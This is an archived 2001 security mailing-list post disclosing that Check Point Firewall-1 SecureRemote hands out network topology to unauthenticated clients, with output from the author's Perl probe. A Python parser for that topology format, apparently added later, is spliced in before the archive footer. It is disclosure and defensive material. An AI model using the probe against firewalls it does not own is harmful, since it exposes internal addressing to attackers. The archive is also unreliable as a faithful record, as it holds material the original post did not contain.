Firewall-1 Information leak

From: Haroon Meer (haroonat_private)
Date: Tue Jul 17 2001 - 18:24:43 PDT


    Hi.
    
    Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
    to create encrypted sessions between users and FW-1 modules. Before remote
    users are able to communicate with internal hosts, a network topology of
    the protected network is downloaded to the client. While newer versions of
    the FW-1 software have the ability to restrict these downloads to only
    authenticated sessions, the default setting allows unauthenticated
    requests to be honoured. This gives a potential attacker a wealth of
    information including IP addresses, network masks (and even friendly
    descriptions).
    
    The attached file will connect to the firewall, and download the
    topology (if SecureRemote is running).
    (It is a tiny Perl file, which needs only Socket, so it avoids the hassle of
    having to install the SecureRemote client <or booting Windows> to test a
    Firewall-1.)
    
    --snip--
    SensePost# perl sr.pl firewall.victim.com
    Testing  on port 256
            :val (
                    :reply (
                            : (-SensePost-dotcom-.hal9000-19.3.167.186
                                    :type (gateway)
                                    :is_fwz (true)
                                    :is_isakmp (true)
                                    :certificates ()
                                    :uencapport (2746)
                                    :fwver (4.1)
                                    :ipaddr (19.3.167.186)
                                    :ipmask (255.255.255.255)
                                    :resolve_multiple_interfaces ()
                                    :ifaddrs (
                                            : (16.3.167.186)
                                            : (12.20.240.1)
                                            : (16.3.170.1)
                                            : (29.203.37.97)
                                    )
                                    :firewall (installed)
                                    :location (external)
                                    :keyloc (remote)
                                    :userc_crypt_ver (1)
                                    :keymanager (
                                            :type (refobj)
                                            :refname ("#_-SensePost-dotcom-")
    
    )                               :name
                                    (-SensePost-dotcom-Neo16.3.167.189)
                                                    :type (gateway)
                                                    :ipaddr (172.29.0.1)
                                                    :ipmask (255.255.255.255)
                                            )
            
    --snip-- 
    
    Haroon Meer
    +27 837866637
    haroonat_private
    http://www.sensepost.com
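The post reproduces the topology reply in Check Point's nested `:key (value)` text format but not a way to read it systematically. The following is an added example (it is not the author's sr.pl and does not contact a firewall): a parser for that format, run over a constructed topology reply modelled on the output above (hostnames and addresses are made up, using documentation ranges plus the 172.29.0.1 address from the post), which inventories what an unauthenticated client learns and flags the RFC 1918 addresses among them. A defender can feed it the reply obtained from their own gateway to judge the exposure before and after restricting topology downloads to authenticated sessions. The grammar implemented is only what the post shows: a value is an optional atom followed by zero or more `:key (...)` entries, and entries with an empty key are list items.

```python
import ipaddress
import re

# Constructed sample, modelled on the reply in the post (not captured from a real gateway).
SAMPLE_TOPOLOGY = """\
:val (
    :reply (
        : (-Example-gw-.hal9000-198.51.100.10
            :type (gateway)
            :is_fwz (true)
            :is_isakmp (true)
            :certificates ()
            :uencapport (2746)
            :fwver (4.1)
            :ipaddr (198.51.100.10)
            :ipmask (255.255.255.255)
            :resolve_multiple_interfaces ()
            :ifaddrs (
                : (198.51.100.10)
                : (10.20.240.1)
                : (192.0.2.1)
            )
            :firewall (installed)
            :location (external)
            :keyloc (remote)
            :userc_crypt_ver (1)
            :keymanager (
                :type (refobj)
                :refname ("#_-Example-gw-")
            )
        )
        : (-Example-gw-.Neo-172.29.0.1
            :type (gateway)
            :ipaddr (172.29.0.1)
            :ipmask (255.255.255.255)
        )
    )
)
"""

# Tokens: parentheses, double-quoted strings, or bare atoms (keys start with ':').
_TOKEN_RE = re.compile(r'\(|\)|"[^"]*"|[^\s()"]+')


def parse_topology(text):
    """Parse the ':key (value)' format into dicts, lists and strings.

    A value with only an atom becomes a string, an empty '()' becomes None,
    entries whose keys are all empty (': (x)') become a list, and otherwise
    a dict; an object's leading atom is stored under '_name'.
    """
    tokens = _TOKEN_RE.findall(text)
    pos = 0

    def expect(tok):
        nonlocal pos
        if pos >= len(tokens) or tokens[pos] != tok:
            got = tokens[pos] if pos < len(tokens) else '<end>'
            raise ValueError(f'expected {tok!r} at token {pos}, got {got!r}')
        pos += 1

    def parse_body():
        nonlocal pos
        name = None
        # Optional leading atom (the object's name or a scalar value).
        if pos < len(tokens) and tokens[pos] not in ('(', ')') and not tokens[pos].startswith(':'):
            name = tokens[pos].strip('"')
            pos += 1
        entries = []
        while pos < len(tokens) and tokens[pos] != ')':
            key = tokens[pos]
            if not key.startswith(':'):
                raise ValueError(f'expected key at token {pos}, got {key!r}')
            pos += 1
            expect('(')
            value = parse_body()
            expect(')')
            entries.append((key[1:], value))
        if not entries:
            return name
        if all(k == '' for k, _ in entries):
            return [v for _, v in entries]
        node = dict(entries)
        if name is not None:
            node['_name'] = name
        return node

    tree = parse_body()
    if pos != len(tokens):
        raise ValueError(f'trailing tokens at {pos}')
    return tree


def exposed_hosts(tree):
    """Flatten the reply into the facts an unauthenticated client learns per object."""
    hosts = []
    for obj in (tree.get('val') or {}).get('reply') or []:
        if isinstance(obj, dict):
            hosts.append({
                'name': obj.get('_name'),
                'type': obj.get('type'),
                'ipaddr': obj.get('ipaddr'),
                'ipmask': obj.get('ipmask'),
                'ifaddrs': obj.get('ifaddrs') or [],
                'fwver': obj.get('fwver'),
            })
    return hosts


_RFC1918 = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]


def rfc1918_addresses(hosts):
    """Addresses in the reply that fall in RFC 1918 space: internal addressing
    that a download answered without authentication has disclosed."""
    found = set()
    for h in hosts:
        for a in [h['ipaddr'], *h['ifaddrs']]:
            try:
                ip = ipaddress.ip_address(a)
            except ValueError:
                continue  # missing or non-address value
            if any(ip in net for net in _RFC1918):
                found.add(str(ip))
    return sorted(found, key=ipaddress.ip_address)


if __name__ == '__main__':
    hosts = exposed_hosts(parse_topology(SAMPLE_TOPOLOGY))
    for h in hosts:
        print(f"{h['name']}: {h['type']} {h['ipaddr']}/{h['ipmask']} ifaddrs={h['ifaddrs']}")
    print('RFC 1918 addresses exposed:', rfc1918_addresses(hosts))
```

Replace `SAMPLE_TOPOLOGY` with the text of a reply saved from your own gateway; the number of gateway objects, their interface lists and the RFC 1918 addresses returned are the quantities worth comparing before and after topology downloads are limited to authenticated sessions.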
    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 20:05:10 PDT